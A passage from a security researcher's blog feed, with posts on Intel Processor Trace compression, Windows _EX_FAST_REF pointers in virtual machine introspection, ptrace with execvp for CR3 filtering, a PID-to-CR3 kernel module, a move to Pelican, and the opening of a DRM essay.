at a slower rate than the uncompressed traces, meaning these two plots are
diverging as time increases.</p>
<p>Another observation to note is the large volume of
trace data produced during the server's startup.
This explains why even the shortest trial produced a 1GB trace.
For the same reason, counting the number
of unique basic blocks turned out not to be useful. The number of new basic
blocks executed while serving requests was small.</p>
<p><center>
<img alt="Figure 2" src="https://carteryagemann.com/images/pt-at-rest-fig2.png">
</center></p>
<p>The next graph shows the relationship between the compressed and uncompressed
sizes as a <a href="https://en.wikipedia.org/wiki/Data_compression_ratio#Definitions">space savings</a>
percentage. The plot best fits a linear regression and shows the savings
decreasing over time. This is likely due to the design of the underlying
compression algorithm, which is intended for general use and does not take into
consideration the unique characteristics of PT traces.</p>
<p>To summarize, this experiment shows that more can be done to compress PT traces
for storage at rest.</p>
<h2>Discussion</h2>
<p>It is understandable that the compression used by PT would produce small space
savings compared to general compression algorithms given the limitations of
hardware memory and Intel's very strict performance overhead requirements. In practice,
PT produces an overhead of less than 4% in the worst case, and less
than 2% on average. These numbers are based on my own observations and the results
published by other researchers. In short, PT has very few clock cycles and very
little space available for performing compression.</p>
<p>Another factor that deserves consideration is compression's impact on processing
time. For systems that consume PT traces on the fly, the largest source of
performance overhead is not PT tracing itself but rather the time spent
buffering and consuming it. In CFI, for example, the PT trace has to be
matched with the executed code in order to reconstruct control-flow. This is why
the authors of
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>
report an 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself.
Adding better space saving compression could increase this overhead further.</p>
<p>That said, for storing PT traces at rest, more can be done to better conserve space.</p>Windows _EX_FAST_REF Pointers and Virtual Machine Introspection2017-08-29T23:00:00-04:002017-08-29T23:00:00-04:00Carter Yagemanntag:carteryagemann.com,2017-08-29:/vmi-windows-fastref.html<p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI …</p><p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI.</p>
<p>Implementing this in Linux was no problem for me because it's the OS I'm
most familiar with. The
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/linux.c#L172">implementation</a>
boils down to getting the current process' <code>task_struct</code>, looking up the
pointer to its memory mapping (<code>task_struct-&gt;mm</code>), and then iterating through its
linked list of virtual memory areas (<code>mm-&gt;mmap</code>) until a match is found. Pretty
straightforward.</p>
<p>Windows seemed a little trickier but very similar. The main difference is that while
Linux uses a linked list of structures called virtual memory areas, Windows
uses structures called virtual address descriptors (VADs) linked into a
balanced binary tree. The procedure is fairly similar. Once the current executive
process (<code>_EPROCESS</code>) is located in memory, read its <code>VadRoot</code> pointer, which, as the name implies,
points to the root of the binary tree of VADs, and then check the root VAD's memory range.
Look up the left child if the range is too high, the right child if the range is too low,
and repeat until the desired VAD is located. A straightforward binary search.</p>
<p>So I implemented my VMI function, ran it, and to my surprise it failed. After
some debugging, I discovered that when the code read <code>VadRoot</code>, the pointer
would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are
some examples of addresses that my code read for 64-bit Windows 7, printed in little-endian:</p>
<div class="highlight"><pre><span></span>1b 3c 90 02 80 fa ff ff
6b 3d 6a 02 80 fa ff ff
3b 69 8e 01 80 fa ff ff
</pre></div>
<p>Why are the 4 least significant bits always <code>0xb</code> and why was I only having
this problem with the <code>VadRoot</code> pointer and no other pointers? Stumped, I asked
my question to the
<a href="https://groups.google.com/forum/#!topic/vmitools/G4EVxAAE71c">libVMI forum</a>
and the developer of <a href="https://drakvuf.com/">DRAKVUF</a> kindly pointed out the
answer:
<em>the Windows kernel sometimes uses a special pointer called a <code>_EX_FAST_REF</code>.</em></p>
<p>If you take a look at the definition for this type, you will notice something
interesting:</p>
<div class="highlight"><pre><span></span><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_EX_FAST_REF</span>
<span class="p">{</span>
<span class="k">union</span>
<span class="p">{</span>
<span class="n">PVOID</span> <span class="n">Object</span><span class="p">;</span>
<span class="n">ULONG</span> <span class="nl">RefCnt</span><span class="p">:</span> <span class="mi">3</span><span class="p">;</span>
<span class="n">ULONG</span> <span class="n">Value</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">}</span> <span class="n">EX_FAST_REF</span><span class="p">,</span> <span class="o">*</span><span class="n">PEX_FAST_REF</span><span class="p">;</span>
</pre></div>
<p>As you can see, the Windows kernel uses the 3 least significant bits as a
reference counter. Therefore, in order to read this pointer correctly using
VMI, these bits need to be masked out after reading the pointer. Once I realized
such a pointer existed, the rest of the
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/windows.c#L170">implementation</a>
was straightforward.</p>
<p>So there you have it. The Windows kernel sometimes uses a special pointer that
stashes a reference counter in the lower bits. Something to watch out for when
you're doing virtual machine introspection. Hopefully this blog post will save
others some time.</p>You never know where your code will end up.2017-07-28T16:30:00-04:002017-07-28T16:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-07-28:/bbs-4chan.html<p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
&gt;&gt;60943289
I&#39;m running it locally, but you can get it here:
https://github.com …</pre></div><p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
&gt;&gt;60943289
I&#39;m running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII
</pre></div>
<p>The link is for a public repository I created on Github. It contains a proxy
server written in Python that allows computers to browse 4Chan via a telnet
connection using a command line interface (CLI) reminiscent of old-school
<a href="https://www.wikipedia.org/wiki/Bulletin_board_system">BBS</a> sites. I wrote it
in a few hours purely as a joke and then never touched it again. Everything
about it was intended as nothing more than a quick laugh, down to how it
crudely converts images into ASCII strings so they can be displayed in the
terminal. I didn't put much effort into the project and I assumed no one would
ever care.</p>
<p>But apparently someone did care and that someone owns a retro computer:</p>
<p><img alt="Retro IBM computer running 4Chan BBS" src="https://carteryagemann.com/images/1497712038601.jpg"></p>
<p>Seeing my code's banner page on a monitor old enough to be from the
days of BBS made my day. I don't know the person that posted this image,
but I'm happy to know someone found value in my forgotten code. It just
goes to show that you never know where your code will end up.</p>Intel Processor Trace, execvp, and ptrace2017-03-21T21:15:00-04:002017-03-21T21:15:00-04:00Carter Yagemanntag:carteryagemann.com,2017-03-21:/pt-execvp-ptrace.html<p>Lately, I've been playing around with Intel Processor Trace (PT), an x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model …</p><p>Lately, I've been playing around with Intel Processor Trace (PT), an x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model specific registers (MSRs)
in the Intel CPU. One useful configuration supported by PT is CR3 filtering.
For those readers less familiar with x86 architecture, when a user process is
executed, the CPU's CR3 register holds the physical address of the process's
page table. Since every process has its own page table, each process will also
have a CR3 value that is distinct from that of every other currently scheduled process.
By configuring PT to use a CR3 filter, tracing can be limited to a single
process.</p>
<p>Early versions of my program could only trace already running processes. I would
use the GNU debugger to start the target process and trap its first instruction
and then I would manually feed its PID into my program as an argument. The Linux
driver would then convert the PID into a CR3 by traversing the process's task
structure (<code>virt_to_phys(task_struct-&gt;mm_struct-&gt;pgd)</code>) and use this address to
configure PT (<code>IA32_RTIT_CR3_MATCH</code>). Needless to say, having to manually start
and trap the target process got very tiring after repeated tracing.</p>
<p>To simplify tracing a process, I wanted my program to take as parameters the
file path of an executable and its arguments and automatically start and trace
the process. My first attempt roughly followed this pseudo code:</p>
<div class="highlight"><pre><span></span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="c1">// Wait for parent to signal that PT is ready</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">target_program</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// Parent process</span>
<span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="n">enable_pt</span><span class="p">();</span>
<span class="c1">// Signal child that PT is ready</span>
<span class="p">}</span>
</pre></div>
<p>Easy enough, right? I compiled the program, ran my first trace and got...
nothing.</p>
<h2>execvp and CR3</h2>
<p>So what went wrong? It turns out we can demonstrate the problem with a simple
test. Consider this small C program:</p>
<div class="highlight"><pre><span></span><span class="c1">// test_1.c</span>
<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"></span>
<span class="kt">void</span> <span class="nf">pid_to_cr3</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">m_pid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
<span class="kt">char</span> <span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="s">&quot;%d&quot;</span><span class="p">,</span> <span class="n">m_pid</span><span class="p">);</span>
<span class="kt">FILE</span> <span class="o">*</span> <span class="n">chardev</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&quot;/dev/pid_to_cr3&quot;</span><span class="p">,</span> <span class="s">&quot;w&quot;</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="n">chardev</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">&quot;./test_2&quot;</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="n">pid_to_cr3</span><span class="p">();</span> <span class="c1">// printed to dmesg</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">argv</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>In this example, <code>/dev/pid_to_cr3</code> is a simple Linux character device that
processes can write a PID into and it will print the corresponding CR3 value
into the kernel log:</p>
<div class="highlight"><pre><span></span><span class="c1">// pid_to_cr3.c</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="n">task</span> <span class="o">=</span> <span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span> <span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">((</span><span class="kt">uintptr_t</span><span class="p">)</span> <span class="n">task</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
<span class="c1">// mm can be NULL in cases such as kthreads, in which case we want the active_mm</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">active_mm</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">cr3_virt</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">pgd</span><span class="p">;</span>
<span class="k">return</span> <span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
<p>After <code>test_1.c</code> passes its PID to <code>/dev/pid_to_cr3</code>, it then uses <code>execvp</code> to
overwrite its memory with a new program: <code>test_2.c</code>. This program simply passes
its PID to <code>/dev/pid_to_cr3</code> as well:</p>
<div class="highlight"><pre><span></span><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"></span>
<span class="kt">void</span> <span class="nf">pid_to_cr3</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">m_pid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
<span class="kt">char</span> <span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="s">&quot;%d&quot;</span><span class="p">,</span> <span class="n">m_pid</span><span class="p">);</span>
<span class="kt">FILE</span> <span class="o">*</span> <span class="n">chardev</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&quot;/dev/pid_to_cr3&quot;</span><span class="p">,</span> <span class="s">&quot;w&quot;</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="n">chardev</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="n">pid_to_cr3</span><span class="p">();</span> <span class="c1">// printed to dmesg</span>
<span class="p">}</span>
</pre></div>
<p>If we compile these source files and execute <code>test_1</code>, we expect that the PID
before and after executing <code>execvp</code> will be the same because <code>execvp</code> causes the
kernel to overwrite the caller's own memory. But what happens to the CR3 value?
As it turns out:</p>
<div class="highlight"><pre><span></span>[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736
</pre></div>
<p>Rather than rewriting the existing caller's page table when <code>execvp</code> is called,
the Linux kernel actually allocates and populates an entirely new page table!
Since our original PT program was getting the CR3 <em>before</em> the <code>execvp</code>, our
trace wasn't including the target program's execution.</p>
<h2>ptrace</h2>
<p>So how do we get the CR3 value <em>after</em> <code>execvp</code> is called by the child? We can't
simply have the parent signal the child, like in the first attempt, because any
code we give to the child process will be overwritten when <code>execvp</code> is called.
The solution instead lies in an OS feature known as <code>ptrace</code>. Using <code>ptrace</code>, the
child process can request (via <code>PTRACE_TRACEME</code>) that its parent trace it as a debugger.
When <code>execvp</code> is completed, the OS will pause the child and signal the parent.
The parent can catch this signal using <code>waitpid()</code>, do whatever it needs to do,
and then resume the child. The code looks something like this:</p>
<div class="highlight"><pre><span></span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// Parent process</span>
<span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Wait for child to complete execvp()</span>
<span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="n">enable_pt</span><span class="p">();</span>
<span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_DETACH</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Resume child</span>
<span class="p">}</span>
</pre></div>
<p>Note that this code detaches the parent from the child once the child has been
paused. This causes the child to resume normal execution. If we wanted to
continue monitoring the child (for example, to detect <code>fork()</code> or <code>clone()</code>), we
could do so.</p>
<p>Making the above modification allows the parent to capture the correct CR3 value
and get a complete PT trace.</p>Of Fancy Bears and Men: Attribution in Cybersecurity2017-03-09T22:30:00-05:002017-03-09T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-03-09:/of-fancy-bears-and-men.html<p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p><p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p>Getting the CR3 value for a PID in Linux2017-01-30T20:30:00-05:002017-01-30T20:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-30:/pid-to-cr3.html<p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000-page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot …</p><p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000-page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot of x86 specific programming and virtual machine introspection (VMI).
To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding
value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture,
I recommend reading <a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">this page</a> on Linux x86 page table management.
The short story is when a process is executed on an x86 CPU, the CR3 register is loaded with the <em>physical</em> address of that process's
<em>page global directory</em> (PGD).
This is necessary so the CPU can perform translations from virtual memory addresses to physical memory addresses.
Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system.
This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is
being executed. Instead, we can just monitor writes to the CR3 register.</p>
<p>However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing.
This is commonly referred to as the <em>semantic gap</em> problem. In order to cross this gap, we need to map the PID values of the processes we're interested
in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:</p>
<div class="highlight"><pre><span></span><span class="cp">#include</span> <span class="cpf">&lt;linux/module.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/sched.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/pid.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;asm/io.h&gt;</span><span class="cp"></span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cr3_phys</span><span class="p">;</span>
<span class="n">task</span> <span class="o">=</span> <span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span> <span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">task</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// pid has no task_struct</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
<span class="c1">// mm can be NULL in some rare cases (e.g. kthreads)</span>
<span class="c1">// when this happens, we should check active_mm</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">active_mm</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// this shouldn&#39;t happen, but just in case</span>
<span class="n">cr3_virt</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">pgd</span><span class="p">;</span>
<span class="n">cr3_phys</span> <span class="o">=</span> <span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="k">return</span> <span class="n">cr3_phys</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>It should be noted that while the CR3 register is useful for tracking which <em>process</em> is being executed, it cannot track which <em>thread</em> is executing
because threads share memory and therefore will have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is
a more complicated task and is a topic for another time.</p>
<p>For simplicity I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection
on an unmodified kernel, you should check out <a href="https://github.com/libvmi/libvmi/blob/master/libvmi/os/linux/memory.c#L145">libVMI's code</a>.</p>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career, an eye-catcher for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not …</p><h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career, an eye-catcher for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not be restricted by the cookie-cutter molds set by
social networking sites. A few months later I was asked to write blog articles for Syracuse University's engineering college and suddenly my website was no longer a single
page. As much as I liked my <a href="https://html5up.net/">HTML5Up</a> design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at
times.</p>
<h2>AMP HTML</h2>
<p>I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main
reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional
was for a site with my name on it to get compromised because I only look at it twice a year.</p>
<p>I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called <a href="https://www.ampproject.org/learn/about-amp/">AMP HTML</a>.
What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP
HTML pages and even social networks like <a href="https://www.ampproject.org/learn/about-amp/">Twitter</a> announced plans to implement AMP HTML caching servers. All this meant free
bandwidth and geographically distributed caching for my humble site. Perfect.</p>
<p>Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on
<a href="https://material.io/guidelines/material-design/introduction.html">Material Design</a>), I realized my decision was not the best. More accurately, my work in security brought
me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the
company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its
true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:</p>
<blockquote>
<p>If you're not paying for it, you're the product.</p>
</blockquote>
<p>There were also three other reasons for my dissatisfaction with AMP HTML:</p>
<h3>Mandatory JavaScript</h3>
<p>As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.).
If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very
rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious
for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just
met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more
true when that JavaScript is heavily compressed and obfuscated.</p>
<h3>In-line CSS</h3>
<p>In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple
web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that led to inconsistent formatting and unnecessary
work.</p>
<h3>Public Opinion</h3>
<p>People, especially those with a technical background, are becoming more conscious of the importance of privacy and security and more wary of the power wielded by major tech
companies. Even the tech enthusiasts who buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is
<a href="https://tech.slashdot.org/story/17/01/18/1455259/the-problem-with-google-amp">negativity towards the AMP HTML platform</a>.</p>
<p>Additionally, as the AMP HTML specification evolves, people both on the <a href="https://stackoverflow.com/questions/41823700/amp-cache-not-getting-removed">technical</a> and
<a href="http://searchengineland.com/google-amp-display-publishers-urls-265945">nontechnical</a> sides are becoming confused.</p>
<p>In response to all these points, I decided it was time to move to a different platform for managing my website.</p>
<h2>Pelican</h2>
<p>For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted a way to be able to write my content in a high level
language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After
looking at what the blogs I read were using and hearing a few recommendations, I decided to go with <a href="https://blog.getpelican.com/">Pelican</a>. For those of you who want to
statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines.
Pages and articles can be written in <a href="https://en.wikipedia.org/wiki/Markdown">Markdown</a>, which should be familiar to anyone who stores code in git repositories.
There are also plenty of free and publicly available <a href="http://www.pelicanthemes.com/">themes</a>, including the one I'm using for the site
<a href="https://github.com/nairobilug/pelican-alchemy/">right now</a>. I'll stop there before I start to sound like a salesman.</p>
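<p>For a taste of the workflow, a hypothetical Pelican article source looks like this (the metadata values are mine for illustration; Pelican reads the <code>Title:</code>, <code>Date:</code>, <code>Category:</code>, and <code>Tags:</code> headers from the top of the Markdown file):</p>

```markdown
Title: My First Post
Date: 2017-01-24 19:20
Category: Blog
Tags: pelican, markdown

The body is ordinary Markdown: **bold text**, [links](https://example.com),
and fenced code blocks all work as expected.
```

<p>Running <code>pelican content</code> then compiles a folder of files like this into the finished static site.</p>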
<p>However, while I'm on the topic of plugging software I like, I will also give a quick mention to <a href="https://wummel.github.io/linkchecker/">linkchecker</a>, which I used to find
and fix a few links in my past articles to external sites that no longer exist.</p>
<p>So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.</p>The Problem with DRM2016-10-22T22:30:00-04:002016-10-22T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-10-22:/drm-problem.html<h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open …</p><h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researcher, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else I hope to present a robust formulation of the problem that is insightful while still being easy to understand.</p>
<p>Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.</p>
<h2>Motivation</h2>
